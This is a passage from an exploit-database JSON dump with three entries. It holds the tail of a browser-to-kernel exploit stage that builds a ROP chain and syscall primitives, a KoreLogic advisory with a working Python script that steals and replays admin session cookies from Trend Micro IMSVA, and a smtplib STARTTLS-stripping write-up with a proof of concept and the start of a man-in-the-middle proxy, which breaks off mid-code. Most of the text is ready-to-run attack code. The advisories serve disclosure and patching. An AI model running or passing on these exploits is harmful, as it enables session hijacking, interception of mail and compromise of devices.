{\r\n this.count++;\r\n return this.count-1;\r\n }\r\n this.finalizeSymbolic = function(idx, val) {\r\n p.write8(this.ropframeptr.add32(idx*8), val);\r\n }\r\n this.push = function(val) {\r\n this.finalizeSymbolic(this.pushSymbolic(), val);\r\n }\r\n this.push_write8 = function(where, what)\r\n {\r\n this.push(gadgets[\"pop rdi\"]); // pop rdi\r\n this.push(where); // where\r\n this.push(gadgets[\"pop rsi\"]); // pop rsi\r\n this.push(what); // what\r\n this.push(gadgets[\"mov [rdi], rsi\"]); // perform write\r\n }\r\n this.fcall = function (rip, rdi, rsi, rdx, rcx, r8, r9)\r\n {\r\n this.push(gadgets[\"pop rdi\"]); // pop rdi\r\n this.push(rdi); // what\r\n this.push(gadgets[\"pop rsi\"]); // pop rsi\r\n this.push(rsi); // what\r\n this.push(gadgets[\"pop rdx\"]); // pop rdx\r\n this.push(rdx); // what\r\n this.push(gadgets[\"pop rcx\"]); // pop r10\r\n this.push(rcx); // what\r\n this.push(gadgets[\"pop r8\"]); // pop r8\r\n this.push(r8); // what\r\n this.push(gadgets[\"pop r9\"]); // pop r9\r\n this.push(r9); // what\r\n this.push(rip); // jmp\r\n return this;\r\n }\r\n \r\n this.run = function() {\r\n var retv = p.loadchain(this, this.notimes);\r\n this.clear();\r\n return retv;\r\n }\r\n \r\n return this;\r\n };\r\n \r\n var RopChain = window.RopChain();\r\n window.syscallnames = {\"exit\": 1,\"fork\": 2,\"read\": 3,\"write\": 4,\"open\": 5,\"close\": 6,\"wait4\": 7,\"unlink\": 10,\"chdir\": 12,\"chmod\": 15,\"getpid\": 20,\"setuid\": 23,\"getuid\": 24,\"geteuid\": 25,\"recvmsg\": 27,\"sendmsg\": 28,\"recvfrom\": 29,\"accept\": 30,\"getpeername\": 31,\"getsockname\": 32,\"access\": 33,\"chflags\": 34,\"fchflags\": 35,\"sync\": 36,\"kill\": 37,\"getppid\": 39,\"dup\": 41,\"pipe\": 42,\"getegid\": 43,\"profil\": 44,\"getgid\": 47,\"getlogin\": 49,\"setlogin\": 50,\"sigaltstack\": 53,\"ioctl\": 54,\"reboot\": 55,\"revoke\": 56,\"execve\": 59,\"execve\": 59,\"msync\": 65,\"munmap\": 73,\"mprotect\": 74,\"madvise\": 75,\"mincore\": 78,\"getgroups\": 79,\"setgroups\": 80,\"setitimer\": 83,\"getitimer\": 86,\"getdtablesize\": 89,\"dup2\": 90,\"fcntl\": 92,\"select\": 93,\"fsync\": 95,\"setpriority\": 96,\"socket\": 97,\"connect\": 98,\"accept\": 99,\"getpriority\": 100,\"send\": 101,\"recv\": 102,\"bind\": 104,\"setsockopt\": 105,\"listen\": 106,\"recvmsg\": 113,\"sendmsg\": 114,\"gettimeofday\": 116,\"getrusage\": 117,\"getsockopt\": 118,\"readv\": 120,\"writev\": 121,\"settimeofday\": 122,\"fchmod\": 124,\"recvfrom\": 125,\"setreuid\": 126,\"setregid\": 127,\"rename\": 128,\"flock\": 131,\"sendto\": 133,\"shutdown\": 134,\"socketpair\": 135,\"mkdir\": 136,\"rmdir\": 137,\"utimes\": 138,\"adjtime\": 140,\"getpeername\": 141,\"setsid\": 147,\"sysarch\": 165,\"setegid\": 182,\"seteuid\": 183,\"stat\": 188,\"fstat\": 189,\"lstat\": 190,\"pathconf\": 191,\"fpathconf\": 192,\"getrlimit\": 194,\"setrlimit\": 195,\"getdirentries\": 196,\"__sysctl\": 202,\"mlock\": 203,\"munlock\": 204,\"futimes\": 206,\"poll\": 209,\"clock_gettime\": 232,\"clock_settime\": 233,\"clock_getres\": 234,\"ktimer_create\": 235,\"ktimer_delete\": 236,\"ktimer_settime\": 237,\"ktimer_gettime\": 238,\"ktimer_getoverrun\": 239,\"nanosleep\": 240,\"rfork\": 251,\"issetugid\": 253,\"getdents\": 272,\"preadv\": 289,\"pwritev\": 290,\"getsid\": 310,\"aio_suspend\": 315,\"mlockall\": 324,\"munlockall\": 325,\"sched_setparam\": 327,\"sched_getparam\": 328,\"sched_setscheduler\": 329,\"sched_getscheduler\": 330,\"sched_yield\": 331,\"sched_get_priority_max\": 332,\"sched_get_priority_min\": 333,\"sched_rr_get_interval\": 334,\"sigprocmask\": 340,\"sigprocmask\": 340,\"sigsuspend\": 341,\"sigpending\": 343,\"sigtimedwait\": 345,\"sigwaitinfo\": 346,\"kqueue\": 362,\"kevent\": 363,\"uuidgen\": 392,\"sendfile\": 393,\"fstatfs\": 397,\"ksem_close\": 400,\"ksem_post\": 401,\"ksem_wait\": 402,\"ksem_trywait\": 403,\"ksem_init\": 404,\"ksem_open\": 405,\"ksem_unlink\": 406,\"ksem_getvalue\": 407,\"ksem_destroy\": 408,\"sigaction\": 416,\"sigreturn\": 417,\"getcontext\": 421,\"setcontext\": 422,\"swapcontext\": 423,\"sigwait\": 429,\"thr_create\": 430,\"thr_exit\": 431,\"thr_self\": 432,\"thr_kill\": 433,\"ksem_timedwait\": 441,\"thr_suspend\": 442,\"thr_wake\": 443,\"kldunloadf\": 444,\"_umtx_op\": 454,\"_umtx_op\": 454,\"thr_new\": 455,\"sigqueue\": 456,\"thr_set_name\": 464,\"rtprio_thread\": 466,\"pread\": 475,\"pwrite\": 476,\"mmap\": 477,\"lseek\": 478,\"truncate\": 479,\"ftruncate\": 480,\"thr_kill2\": 481,\"shm_open\": 482,\"shm_unlink\": 483,\"cpuset_getid\": 486,\"cpuset_getaffinity\": 487,\"cpuset_setaffinity\": 488,\"openat\": 499,\"pselect\": 522,\"wait6\": 532,\"cap_rights_limit\": 533,\"cap_ioctls_limit\": 534,\"cap_ioctls_get\": 535,\"cap_fcntls_limit\": 536,\"bindat\": 538,\"connectat\": 539,\"chflagsat\": 540,\"accept4\": 541,\"pipe2\": 542,\"aio_mlock\": 543,\"procctl\": 544,\"ppoll\": 545,\"futimens\": 546,\"utimensat\": 547,\"numa_getaffinity\": 548,\"numa_setaffinity\": 549}\r\n \r\n function swapkeyval(json){\r\n var ret = {};\r\n for(var key in json){\r\n if (json.hasOwnProperty(key)) {\r\n ret[json[key]] = key;\r\n }\r\n }\r\n return ret;\r\n }\r\n \r\n window.nameforsyscall = swapkeyval(window.syscallnames);\r\n \r\n window.syscalls = {};\r\n \r\n log(\"--- welcome to stage3 ---\");\r\n \r\n var kview = new Uint8Array(0x1000);\r\n var kstr = p.leakval(kview).add32(0x10);\r\n var orig_kview_buf = p.read8(kstr);\r\n \r\n p.write8(kstr, window.libKernelBase);\r\n p.write4(kstr.add32(8), 0x40000); // high enough lel\r\n \r\n var countbytes;\r\n for (var i=0; i < 0x40000; i++)\r\n {\r\n if (kview[i] == 0x72 && kview[i+1] == 0x64 && kview[i+2] == 0x6c && kview[i+3] == 0x6f && kview[i+4] == 0x63)\r\n {\r\n countbytes = i;\r\n break;\r\n }\r\n }\r\n p.write4(kstr.add32(8), countbytes + 32);\r\n \r\n var dview32 = new Uint32Array(1);\r\n var dview8 = new Uint8Array(dview32.buffer);\r\n for (var i=0; i < countbytes; i++)\r\n {\r\n if (kview[i] == 0x48 && kview[i+1] == 0xc7 && kview[i+2] == 0xc0 && kview[i+7] == 0x49 && kview[i+8] == 0x89 && kview[i+9] == 0xca && kview[i+10] == 0x0f && kview[i+11] == 0x05)\r\n {\r\n dview8[0] = kview[i+3];\r\n dview8[1] = kview[i+4];\r\n dview8[2] = kview[i+5];\r\n dview8[3] = kview[i+6];\r\n var syscallno = dview32[0];\r\n window.syscalls[syscallno] = window.libKernelBase.add32(i);\r\n }\r\n }\r\n var chain = new window.RopChain;\r\n var returnvalue;\r\n p.fcall_ = function(rip, rdi, rsi, rdx, rcx, r8, r9) {\r\n chain.clear();\r\n \r\n chain.notimes = this.next_notime;\r\n this.next_notime = 1;\r\n \r\n chain.fcall(rip, rdi, rsi, rdx, rcx, r8, r9);\r\n \r\n chain.push(window.gadgets[\"pop rdi\"]); // pop rdi\r\n chain.push(chain.ropframeptr.add32(0x3ff8)); // where\r\n chain.push(window.gadgets[\"mov [rdi], rax\"]); // rdi = rax\r\n \r\n chain.push(window.gadgets[\"pop rax\"]); // pop rax\r\n chain.push(p.leakval(0x41414242)); // where\r\n \r\n if (chain.run().low != 0x41414242) throw new Error(\"unexpected rop behaviour\");\r\n returnvalue = p.read8(chain.ropframeptr.add32(0x3ff8)); //p.read8(chain.ropframeptr.add32(0x3ff8));\r\n }\r\n p.fcall = function()\r\n {\r\n var rv=p.fcall_.apply(this,arguments);\r\n return returnvalue;\r\n }\r\n p.readstr = function(addr){\r\n var addr_ = addr.add32(0); // copy\r\n var rd = p.read4(addr_);\r\n var buf = \"\";\r\n while (rd & 0xFF)\r\n {\r\n buf += String.fromCharCode(rd & 0xFF);\r\n addr_.add32inplace(1);\r\n rd = p.read4(addr_);\r\n }\r\n return buf;\r\n }\r\n \r\n p.syscall = function(sysc, rdi, rsi, rdx, rcx, r8, r9)\r\n {\r\n if (typeof sysc == \"string\") {\r\n sysc = window.syscallnames[sysc];\r\n }\r\n if (typeof sysc != \"number\") {\r\n throw new Error(\"invalid syscall\");\r\n }\r\n \r\n var off = window.syscalls[sysc];\r\n if (off == undefined)\r\n {\r\n throw new Error(\"invalid syscall\");\r\n }\r\n \r\n return p.fcall(off, rdi, rsi, rdx, rcx, r8, r9);\r\n }\r\n p.sptr = function(str) {\r\n var bufView = new Uint8Array(str.length+1);\r\n for (var i=0; i<str.length; i++) {\r\n bufView[i] = str.charCodeAt(i) & 0xFF;\r\n }\r\n window.nogc.push(bufView);\r\n return p.read8(p.leakval(bufView).add32(0x10));\r\n };\r\n \r\n log(\"loaded sycalls\");\r\n \r\n var rtv1 = p.fcall(window.gadgets[\"mov rax, rdi\"], 0x41414141);\r\n var pid = p.syscall(\"getpid\");\r\n var uid = p.syscall(\"getuid\");\r\n print(\"all good. fcall test retval = \" + rtv1 + \" - uid: \" + uid + \" - pid: \" + pid);\r\n \r\n sc = document.createElement(\"script\");\r\n sc.src=\"kern.js\";\r\n document.body.appendChild(sc);\r\n}\r\n<--- /rop.js -->\n\n# 0day.today [2018-03-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29989"}, {"lastseen": "2018-04-02T09:36:26", "bulletinFamily": "exploit", "description": "Trend Micro IMSVA Management Portal version 9.1.0.1600 suffers from an authentication bypass vulnerability.", "modified": "2018-02-10T00:00:00", "published": "2018-02-10T00:00:00", "href": "https://0day.today/exploit/description/29759", "id": "1337DAY-ID-29759", "title": "Trend Micro IMSVA Management Portal 9.1.0.1600 Authentication Bypass Exploit", "type": "zdt", "sourceData": "Title: Trend Micro IMSVA Management Portal Authentication Bypass\r\nAdvisory ID: KL-001-2018-006\r\nPublication Date: 2018.02.08\r\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-006.txt\r\n\r\n\r\n1. Vulnerability Details\r\n\r\n Affected Vendor: Trend Micro\r\n Affected Product: InterScan Mail Security Virtual Apppliance\r\n Affected Version: 9.1.0.1600\r\n Platform: Embedded Linux\r\n CWE Classification: CWE-522: Insufficiently Protected Credentials, CWE-219: Sensitive Data Under Web Root\r\n Impact: Authentication Bypass\r\n Attack vector: HTTPS\r\n\r\n2. Vulnerability Description\r\n\r\n Any unauthenticated user can bypass the authentication process.\r\n\r\n3. Technical Description\r\n\r\n The web application is plugin-based and allows widgets to\r\n be loaded into the application. A plugin which is loaded by\r\n default stores a log file of events in a directory which can be\r\n accessed by unauthenticated users. Files within this directory\r\n (such as /widget/repository/log/diagnostic.log) which contain\r\n cookie values can then be read, parsed, and session information\r\n extracted. A functional exploit is shown below.\r\n\r\n4. Mitigation and Remediation Recommendation\r\n\r\n Trend Micro has released a Critical Patch update to the\r\n affected versions for this vulnerability. The advisory and\r\n links to the patch(es) are available from the following URL:\r\n\r\n https://success.trendmicro.com/solution/1119277\r\n\r\n5. Credit\r\n\r\n This vulnerability was discovered by Matt Bergin (@thatguylevel)\r\n of KoreLogic, Inc.\r\n\r\n6. Disclosure Timeline\r\n\r\n 2017.08.11 - KoreLogic submits vulnerability details to Trend Micro.\r\n 2017.08.11 - Trend Micro confirms receipt.\r\n 2017.09.15 - KoreLogic asks for an update on the triage of the\r\n reported issue.\r\n 2017.09.15 - Trend Micro informs KoreLogic that the issue is in\r\n remediation but there is no expected release date yet.\r\n 2017.09.25 - 30 business days have elapsed since the vulnerability\r\n was reported to Trend Micro.\r\n 2017.10.06 - Trend Micro informs KoreLogic that the issue will not\r\n be addressed before the 45 business-day deadline. They\r\n ask for additional time for the details to remain\r\n embargoed in order to complete QA on the proposed fix.\r\n 2017.10.06 - KoreLogic agrees to extend the disclosure timeline.\r\n 2017.10.17 - 45 business days have elapsed since the vulnerability\r\n was reported to Trend Micro.\r\n 2017.11.02 - Trend Micro notifies KoreLogic that the Critical Patch\r\n for IMSVA 9.1 (Critical Patch 1682) has gone live,\r\n but they are still working on the patch for IMSVA 9.0.\r\n 2017.11.07 - 60 business days have elapsed since the vulnerability\r\n was reported to Trend Micro.\r\n 2017.12.21 - 90 business days have elapsed since the vulnerability\r\n was reported to Trend Micro.\r\n 2017.12.28 - Trend Micro notifies KoreLogic that the IMSVA 9.0\r\n Critical Patch is being localized for foreign language\r\n customers. Expected release date is late January 2018.\r\n 2018.01.18 - Trend Micro notifies KoreLogic that the expected release\r\n date for the IMSVA 9.0 Critical Patch and the advisory\r\n is to be January 31, 2018.\r\n 2018.01.23 - 110 business days have elapsed since the vulnerability\r\n was reported to Trend Micro.\r\n 2018.01.31 - Trend Micro releases the advisory associated with this\r\n vulnerability and the related Critical Patches.\r\n 2018.02.08 - KoreLogic public disclosure.\r\n\r\n7. Proof of Concept\r\n\r\n#!/usr/bin/python3\r\n\r\n\r\nfrom argparse import ArgumentParser\r\nfrom ssl import _create_unverified_context\r\nfrom time import mktime\r\nfrom urllib.request import HTTPSHandler, HTTPError, Request, urlopen, build_opener\r\n\r\n\r\nbanner = '''Trendmicro IMSVA 9.1.0.1600 Management Portal Authentication Bypass\r\n{}'''.format('-'*67)\r\n\r\n\r\nclass Exploit:\r\n def __init__(self, args):\r\n self.target_host = args.host\r\n self.target_port = args.port\r\n self.list_all = args.ls\r\n self.sessions = []\r\n self.session_latest_time = None\r\n self.session_latest_id = None\r\n self.sessions_active = []\r\n return None\r\n\r\n def is_target(self):\r\n url_loginpage = Request('https://{}:{}/loginPage.imss'.format(self.target_host, self.target_port))\r\n url_loginjsp = Request('https://{}:{}/jsp/framework/login.jsp'.format(self.target_host, self.target_port))\r\n if urlopen(url_loginpage, context=_create_unverified_context()).getcode() == 200:\r\n try:\r\n urlopen(url_loginjsp, context=_create_unverified_context())\r\n except HTTPError as e:\r\n if e.code == 403:\r\n return True\r\n else:\r\n return False\r\n return False\r\n\r\n def get_sessions(self):\r\n url_vulnpage = Request('https://{}:{}/widget/repository/log/diagnostic.log'.format(self.target_host,\r\nself.target_port))\r\n vuln_obj = urlopen(url_vulnpage, context=_create_unverified_context())\r\n if vuln_obj.getcode() == 200:\r\n vuln_pagedata = vuln_obj.read()\r\n for line in vuln_pagedata.decode('utf8').split('\\n'):\r\n if 'product_auth' in line and 'JSEEEIONID' in line:\r\n self.sessions.append((line.split(',')[0], line.split(',')[-1].split(' ')[1].split(':')[1]))\r\n else:\r\n return False\r\n return True\r\n\r\n def find_latest(self):\r\n for session in list(set(self.sessions)):\r\n year, month, day = session[0].split(' ')[0].split('-')\r\n hour, minute, second = session[0].split(' ')[1].split(':')\r\n session_time = mktime((int(year), int(month), int(day), int(hour), int(minute), int(second), 0, 0, 0))\r\n if self.session_latest_time is None:\r\n self.session_latest_time = session_time\r\n if session_time > self.session_latest_time:\r\n self.session_latest_time = session_time\r\n self.session_latest_id = session[1]\r\n if self.list_all:\r\n if self.is_session_alive():\r\n self.sessions_active.append((self.session_latest_time, self.session_latest_id))\r\n return True\r\n\r\n def is_session_alive(self):\r\n url_consolepage = Request('https://{}:{}/console.imss'.format(self.target_host, self.target_port))\r\n opener = build_opener(HTTPSHandler(context=_create_unverified_context()))\r\n opener.addheaders.append(('Cookie', 'JSESSIONID={}'.format(self.session_latest_id)))\r\n console_obj = opener.open(url_consolepage)\r\n if console_obj.getcode() == 200:\r\n console_pagedata = console_obj.read().decode('utf8')\r\n if 'parent.location.href=\"/timeout.imss\"' in console_pagedata:\r\n return False\r\n else:\r\n return False\r\n return True\r\n\r\n def run(self):\r\n if self.is_target():\r\n if self.get_sessions():\r\n print('[-] Leaked {} sessions'.format(len(self.sessions)))\r\n self.find_latest()\r\n if self.list_all and self.sessions_active:\r\n print('[+] Active sessions leaked.')\r\n sessions = []\r\n for entry in list(set(self.sessions_active)):\r\n sessions.append(entry[1])\r\n for session in list(set(sessions)):\r\n print('Set-Cookie: JSESSIONID={}'.format(session))\r\n elif self.is_session_alive():\r\n print('[+] Active session leaked.')\r\n print('Set-Cookie: JSESSIONID={}'.format(self.session_latest_id))\r\n return True\r\n else:\r\n print('[-] {} sessions leaked but none are active.'.format(len(self.sessions)))\r\n return False\r\n else:\r\n return False\r\n else:\r\n return False\r\n return False\r\n\r\n\r\nif __name__ == '__main__':\r\n print(banner)\r\n arg_parser = ArgumentParser(add_help=False)\r\n arg_parser.add_argument('-H', '--help', action='help', help='Help')\r\n arg_parser.add_argument('-h', '--host', default=None, required=True, help='Target host')\r\n arg_parser.add_argument('-p', '--port', default=8445, type=int, help='Target port')\r\n arg_parser.add_argument('-l', '--ls', action='store_true', default=False, help='List all sessions (noisy)')\r\n\r\n args = arg_parser.parse_args()\r\n\r\n Exploit(args).run()\r\n\r\n\r\nThe contents of this advisory are copyright(c) 2018\r\nKoreLogic, Inc. and are licensed under a Creative Commons\r\nAttribution Share-Alike 4.0 (United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n\r\nKoreLogic, Inc. is a founder-owned and operated company with a\r\nproven track record of providing security services to entities\r\nranging from Fortune 500 to small and mid-sized companies. We\r\nare a highly skilled team of senior security consultants doing\r\nby-hand security assessments for the most important networks in\r\nthe U.S. and around the world. We are also developers of various\r\ntools and resources aimed at helping the security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n\r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt\r\n\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29759"}, {"lastseen": "2018-04-05T23:44:36", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category local exploits", "modified": "2018-01-11T00:00:00", "published": "2018-01-11T00:00:00", "href": "https://0day.today/exploit/description/29438", "id": "1337DAY-ID-29438", "type": "zdt", "title": "Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping Vulnerability", "sourceData": "VuNote\r\n============\r\n \r\n Author: <github.com/tintinweb>\r\n Version: 0.2\r\n Date: Nov 25th, 2015\r\n \r\n Tag: python smtplib starttls stripping (mitm)\r\n \r\nOverview\r\n--------\r\n \r\n Name: python \r\n Vendor: python software foundation\r\n References: * https://www.python.org/ [1]\r\n \r\n Version: 2.7.11, 3.4.4, 3.5.1\r\n Latest Version: 2.7.11, 3.4.4, 3.5.1 [2]\r\n Other Versions: 2.2 [3] (~14 years ago) <= affected <= 2.7.11\r\n 3.0 [3] (~7 years ago) <= affected <= 3.4.4\r\n 3.5.1\r\n Platform(s): cross\r\n Technology: c/python\r\n \r\n Vuln Classes: Selection of Less-Secure Algorithm During Negotiation (CWE-757)\r\n Origin: remote/mitm\r\n Min. Privs.: -\r\n \r\n CVE: CVE-2016-0772\r\n \r\n \r\nDescription\r\n---------\r\n \r\nquote wikipedia [4]\r\n \r\n>Python is a widely used high-level, general-purpose, interpreted, dynamic programming language. Its design philosophy emphasizes code readability, and its syntax allows programmers to express concepts in fewer lines of code than would be possible in languages such as C++ or Java.[24][25] The language provides constructs intended to enable clear programs on both a small and large scale.\r\n \r\n \r\nSummary \r\n-------\r\n \r\npython smtplib does not seem to raise an exception when the remote \r\nend (smtp server) is capable of negotiating starttls (as seen in the \r\nresponse to ehlo) but fails to respond with 220 (ok) to an explicit \r\ncall of `SMTP.starttls()`. This may allow a malicious mitm to perform a \r\nstarttls stripping attack if the client code does not explicitly check \r\nthe response code for starttls, which is rarely done as one might \r\nexpect that it raises an exception when starttls negotiation fails \r\n(like when calling starttls on a server that does not support it or \r\nwhen it fails to negotiate tls due to an ssl exception/cipher \r\nmismatch/auth fail).\r\n \r\nQuoting the PSRT with an extended analysis\r\n \r\n> It is a surprising and potential dangerous behavior. It also violates Python's documentation. states that all SMTP commands after starttls() are encrypted. That's clearly not true in case of response != 200. I also had a look how the other stdlib libraries handle starttls problems. nntplib's and imaplib's starttls() method raise an error when the starttls handshake fails.\r\n \r\nChecking on how `smtplib.starttls()` is actually being used by open-source projects underlines that `smtplib.starttls()` is generally expected to throw an exception if the starttls protocol was not executed correctly. Therefore this issue may have an impact on some major projects like Django, web2py. Apart from that the current `smtplib.starttls()` behavior is different to `nntplib.starttls()`, `imaplib.starttls()`\r\n \r\nPoC see [6]\r\npatch attached.\r\n \r\nDetails\r\n------\r\n \r\nThe vulnerable code is located in `lib/smtplib.py` [3] line 646 (2.7 branch) and \r\nfails to raise an exception if `resp!=220`.\r\n \r\nThe documentation [7] suggests that `starttls()` either encrypts all communication\r\nor throws an exception if it was not able to negotiate tls.\r\n \r\n SMTP.starttls([keyfile[, certfile]])\r\n Put the SMTP connection in TLS (Transport Layer Security) mode. All SMTP commands that follow will be encrypted. You should then call ehlo() again.\r\n \r\n If keyfile and certfile are provided, these are passed to the socket module\ufffds ssl() function.\r\n \r\n If there has been no previous EHLO or HELO command this session, this method tries ESMTP EHLO first.\r\n \r\n Changed in version 2.6.\r\n \r\n SMTPHeloError\r\n The server didn\ufffdt reply properly to the HELO greeting.\r\n SMTPException\r\n The server does not support the STARTTLS extension.\r\n Changed in version 2.6.\r\n \r\n RuntimeError\r\n SSL/TLS support is not available to your Python interpreter.\r\n \r\n \r\nCode `lib/smtplib.py`:\r\n \r\nInline annotations are prefixed with `//#!`\r\n \r\n def starttls(self, keyfile=None, certfile=None):\r\n \"\"\"Puts the connection to the SMTP server into TLS mode.\r\n If there has been no previous EHLO or HELO command this session, this\r\n method tries ESMTP EHLO first.\r\n If the server supports TLS, this will encrypt the rest of the SMTP\r\n session. If you provide the keyfile and certfile parameters,\r\n the identity of the SMTP server and client can be checked. This,\r\n however, depends on whether the socket module really checks the\r\n certificates.\r\n This method may raise the following exceptions:\r\n SMTPHeloError The server didn't reply properly to\r\n the helo greeting.\r\n \"\"\"\r\n self.ehlo_or_helo_if_needed()\r\n if not self.has_extn(\"starttls\"):\r\n raise SMTPException(\"STARTTLS extension not supported by server.\")\r\n (resp, reply) = self.docmd(\"STARTTLS\")\r\n if resp == 220: //#! with a server not responding 220 it wont even try to negotiate tls\r\n if not _have_ssl: //#! silently stays unencrypted\r\n raise RuntimeError(\"No SSL support included in this Python\")\r\n self.sock = ssl.wrap_socket(self.sock, keyfile, certfile)\r\n self.file = SSLFakeFile(self.sock)\r\n # RFC 3207:\r\n # The client MUST discard any knowledge obtained from\r\n # the server, such as the list of SMTP service extensions,\r\n # which was not obtained from the TLS negotiation itself.\r\n self.helo_resp = None\r\n self.ehlo_resp = None\r\n self.esmtp_features = {}\r\n self.does_esmtp = 0\r\n return (resp, reply) //#! to actually detect this a client would have to manually check resp==220\r\n //#! or that the socket was turned into an SSLSock object\r\n \r\nProof of Concept\r\n----------------\r\n \r\n1. start `striptls.py` proxy\r\n \r\n #> python striptls/striptls.py -l 0.0.0.0:9999 -r remote.mailserver.tld:25 -x SMTP.StripWithInvalidResponseCode\r\n \r\n - INFO - <Proxy 0x1f04910 listen=('0.0.0.0', 9999) target=('remote.mailserver.tld', 25)> ready.\r\n - DEBUG - * added test (port:25 , proto: SMTP): <class __main__.StripWithInvalidResponseCode at 0x020F85E0>\r\n - INFO - <RewriteDispatcher vectors={25: set([<class __main__.StripWithInvalidResponseCode at 0x020F85E0>])}>\r\n \r\n2. send mail using `smtplib` (starttls)\r\n \r\n import smtplib\r\n server = smtplib.SMTP('localhost', port=9999)\r\n server.set_debuglevel(1)\r\n server.ehlo()\r\n print server.esmtp_features\r\n server.starttls()\r\n server.sendmail(\"[email\u00a0protected]\", \"[email\u00a0protected]\", \"From: [email\u00a0protected]\\r\\nTo: [email\u00a0protected]\\r\\n\\r\\n\")\r\n server.quit()\r\n \r\n3. watch `striptls.py` fake the server response with `resp=200` instead of `resp=220`, not forwarding the message to the server. This effectively strips starttls. `smtplib` keeps sending in plaintext with no indication to the client code that starttls negotiation actually failed.\r\n \r\n - DEBUG - <ProtocolDetect 0x1f25530 protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)\r\n - INFO - <Session 0x1f0ea50> client ('127.0.0.1', 59687) has connected\r\n - INFO - <Session 0x1f0ea50> connecting to target ('remote.mailserver.tld', 25)\r\n - DEBUG - <Session 0x1f0ea50> [client] <= [server] '220 mailserver.tld (msrv002) Nemesis ESMTP Service ready\\r\\n'\r\n - DEBUG - <RewriteDispatcher - changed mangle: __main__.StripWithInvalidResponseCode new: True>\r\n - DEBUG - <Session 0x1f0ea50> [client] => [server] 'ehlo [192.168.139.1]\\r\\n'\r\n - DEBUG - <Session 0x1f0ea50> [client] <= [server] '250-gmx.com Hello [192.168.139.1] [x.x.x.x]\\r\\n250-SIZE 3 1457280\\r\\n250-AUTH LOGIN PLAIN\\r\\n250 STARTTLS\\r\\n'\r\n - DEBUG - <Session 0x1f0ea50> [client] => [server] 'STARTTLS\\r\\n'\r\n - DEBUG - <Session 0x1f0ea50> [client] <= [server][mangled] '200 STRIPTLS\\r\\n'\r\n - DEBUG - <Session 0x1f0ea50> [client] => [server][mangled] None\r\n - DEBUG - <Session 0x1f0ea50> [client] => [server] 'mail FROM:<[email\u00a0protected]> size=10\\r\\n'\r\n - DEBUG - <Session 0x1f0ea50> [client] <= [server] '530 Authentication required\\r\\n'\r\n - DEBUG - <Session 0x1f0ea50> [client] => [server] 'rset\\r\\n'\r\n - DEBUG - <Session 0x1f0ea50> [client] <= [server] '250 OK\\r\\n'\r\n - WARNING - <Session 0x1f0ea50> terminated.\r\n \r\nPatch\r\n-------\r\n \r\n* raise an exception if the server replies with an unexpected return-code to an explicit call for `smtplib.starttls()`.\r\n \r\n #https://github.com/python/cpython <master> diff --git a/Lib/smtplib.py b/Lib/smtplib.py index 4756973..dfbf5f9 100755\r\n --- a/Lib/smtplib.py\r\n +++ b/Lib/smtplib.py\r\n @@ -773,6 +773,11 @@ class SMTP:\r\n self.ehlo_resp = None\r\n self.esmtp_features = {}\r\n self.does_esmtp = 0\r\n + else:\r\n + # RFC 3207:\r\n + # 501 Syntax error (no parameters allowed)\r\n + # 454 TLS not available due to temporary reason\r\n + raise SMTPResponseException(resp, reply)\r\n return (resp, reply)\r\n \r\n def sendmail(self, from_addr, to_addrs, msg, mail_options=[],\r\n \r\nNotes\r\n-----\r\n \r\nVendor response: see [8,9,10]\r\n \r\nTimeline:\r\n \r\n 11/25/2015 contact psrt; provided details, PoC, proposed patch\r\n 12/01/2016 response, initial analysis\r\n 01/29/2016 request ETA, bugref\r\n 02/01/2016 psrt assigned CVE-2016-0772\r\n 02/12/2016 response: will be addressed in upcoming 2.7, 3.5\r\n 02/13/2016 request ETA; response: no exact date\r\n 03/29/2016 request ETA; response: generic bounce message\r\n 05/12/2016 request ETA; no response\r\n 05/27/2016 request ETA; response: no exact date\r\n 06/12/2016 request ETA;\r\n 06/14/2016 response: ETA ~ June 26th\r\n 06/14/2016 vendor announcement [9]\r\n \r\nReferences\r\n---------\r\n \r\n [1] https://www.python.org/\r\n [2] https://www.python.org/downloads/\r\n [3] https://github.com/python/cpython/blob/2.7/Lib/smtplib.py\r\n [4] https://en.wikipedia.org/wiki/Python_(programming_language)\r\n [5] https://docs.python.org/2/library/smtplib.html#smtplib.SMTP.starttls\r\n [6] https://github.com/tintinweb/striptls\r\n [7] https://docs.python.org/2/library/smtplib.html\r\n [8] https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-0772\r\n [9] http://www.openwall.com/lists/oss-security/2016/06/14/9\r\n [10] https://access.redhat.com/security/cve/cve-2016-0772\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n#! /usr/bin/env python\r\n# -*- coding: UTF-8 -*-\r\n# Author : <github.com/tintinweb>\r\n# see: https://github.com/tintinweb/striptls\r\n# pip install striptls\r\n#\r\n'''\r\n inbound outbound\r\n[inbound_peer]<------------>[listen:proxy]<------------->[outbound_peer/target]\r\n'''\r\nimport sys\r\nimport os\r\nimport logging\r\nimport socket\r\nimport select\r\nimport ssl\r\nimport time\r\nimport re\r\n \r\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(levelname)-8s - %(message)s')\r\nlogger = logging.getLogger(__name__)\r\n \r\nclass SessionTerminatedException(Exception):pass\r\nclass ProtocolViolationException(Exception):pass\r\n \r\nclass TcpSockBuff(object):\r\n ''' Wrapped Tcp Socket with access to last sent/received data '''\r\n def __init__(self, sock, peer=None):\r\n self.socket = None\r\n self.socket_ssl = None\r\n self.recvbuf = ''\r\n self.sndbuf = ''\r\n self.peer = peer\r\n self._init(sock)\r\n \r\n def _init(self, sock):\r\n self.socket = sock\r\n \r\n def connect(self, target=None):\r\n target = target or self.peer\r\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n return self.socket.connect(target)\r\n \r\n def accept(self):\r\n return self.socket.accept()\r\n \r\n def recv(self, buflen=8*1024, *args, **kwargs):\r\n if self.socket_ssl:\r\n chunks = []\r\n chunk 